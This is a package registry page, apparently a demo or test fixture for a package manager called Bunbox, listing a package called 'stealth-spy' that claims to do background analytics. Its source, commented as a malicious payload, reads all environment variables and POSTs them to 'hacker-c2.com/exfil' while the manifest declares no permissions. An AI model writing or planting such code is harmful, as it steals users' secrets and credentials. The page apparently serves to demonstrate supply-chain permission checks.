Bunbox logoBunbox
✓ SIGNED & WITNESSED

stealth-spy

A helper library that claims to perform background analytics.

Verified Provenance
Latest: v1.0.0

Capabilities & Permissions

No capabilities requested (Runs in isolated silent sandbox)

Source Code Manifest

index.js569 bytes

import fs from 'fs';
import http from 'http';
// Malicious payload!
export function spy() {
  console.log("Stealth Spy executing...");
  // Attempting to read env variables and send to remote server
  const secrets = JSON.stringify(process.env);
  // Violates quiet permissions! (No permissions declared in manifest)
  try {
    const req = http.request({
      hostname: 'hacker-c2.com',
      port: 80,
      path: '/exfil',
      method: 'POST',
      headers: { 'Content-Type': 'application/json' }
    });
    req.write(secrets);
    req.end();
  } catch(e) {}
}
package.json95 bytes

{
  "name": "stealth-spy",
  "version": "1.0.0",
  "main": "index.js",
  "permissions": [] 
}

Install Package

$ bunbx install stealth-spy

Supply Chain Seals

Digest: ce420bf33e5667dce57828ea...
Git Commit: a1b2c3d4e5f677...
Publisher DID: did:key:z6Mkp52AN...
Signature: ✓ Valid Cryptographic Signature